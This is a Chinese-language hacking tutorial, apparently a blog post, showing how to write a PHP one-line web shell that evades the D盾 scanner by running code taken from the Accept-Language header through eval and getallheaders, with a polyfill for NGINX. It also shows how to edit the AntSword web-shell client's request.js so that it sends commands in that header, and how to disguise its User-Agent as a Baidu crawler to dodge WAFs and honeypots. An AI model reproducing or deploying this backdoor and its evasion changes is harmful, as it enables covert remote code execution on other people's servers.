原创文章,转载希望带个版权,谢谢
1,过狗PHP一句话
现在的防护软件,对GET和POST检查很严格
用php混淆,编写function,定义class来绕过这些防护软件,熟悉php的人对绕过这些软件还是比较容易的。
我们这里就不多说明了,
我们先来了解一下PHP的超全局变量
这些里面有一些是我们可控的,那么我们可以利用里面任意一个可控的去发送数据,别老盯着POST,GET。
我们这里就随便选用一个@eval($_SERVER['HTTP_ACCEPT_LANGUAGE']);
我们用浏览器语言来发送执行代码
但是很可惜被D盾杀了
这里我想到另外一个获取HTTP头信息的函数
getallheaders()
但是这个函数只能在Apache+PHP环境下使用
NGINX下是不支持这个函数的
先不管那么多,试试看@eval(getallheaders()['Accept-Language']);
成功躲过了D盾查杀
这个代码还是比较短小精悍的.
但是使用起来不方便,要自己每次修改浏览器language去执行shell,还不能对NGINX使用。
我们来继续解决这两个用户“痛点”
2.改造中国蚁剑/AntSword
先来解决NGINX不支持的问题
我们自己写个function吧
<?php
if (!function_exists('getallheaders')) {
function getallheaders() {
$headers = array();
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_') {
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
} }
return $headers;
}
}
@eval(getallheaders()['Accept-Language']);
?>D盾还是不杀的
接下来解决第二个用户痛点
我们来修改下中国蚁剑AntSword
让它能控制上面这个shell
上一篇讲过
https://www.3hack.com/tools/17.html
中国蚁剑AntSword要修改下user-agent
要注意的是
软件默认的user-agent是
User-Agent: antSword/v2.0
大部分人都不会去自定义useragent
这就给waf和蜜罐白送了一个特征
所以我们要修改一下源代码
修改项目内
antSword-2.0.2\modules\request.js (17行一处)
antSword-2.0.2\modules\update.js (两处)
Baiduspider-image
我改成列百度图片蜘蛛这次我们还是修改request.js
这是AntSword的发包核心模块
我们找到
const _postData = Object.assign({}, opts.body, opts.data);
_request在这两行中间插入一句 _request.set('Accept-Language',_postData[1]);
_postData[1]是软件发送的执行代码
注意:我们shell的配置信息密码也要写1
变成
const _postData = Object.assign({}, opts.body, opts.data);
_request.set('Accept-Language',_postData[1]);
_request重启AntSword
我们编辑下shell,密码要是1,为了更好的过WAF
我们把编码模式也改成chr
我们先关闭一句话,来记录下文件,看看shell收到的内容
在AntSword里面双击shell,再看看记录的txt
!!!分割的,上面是post的内容,下面是language的内容
我们发现是一样的了,说明程序发了两份代码,一份在language内,还是会发一份post给shell
这样有个好处,就是post的一句话也照样执行。
我们打开shell来看看
发现可以了,再头部language里面执行一句话,也可以用软件来控制了
来试试虚拟终端,也ok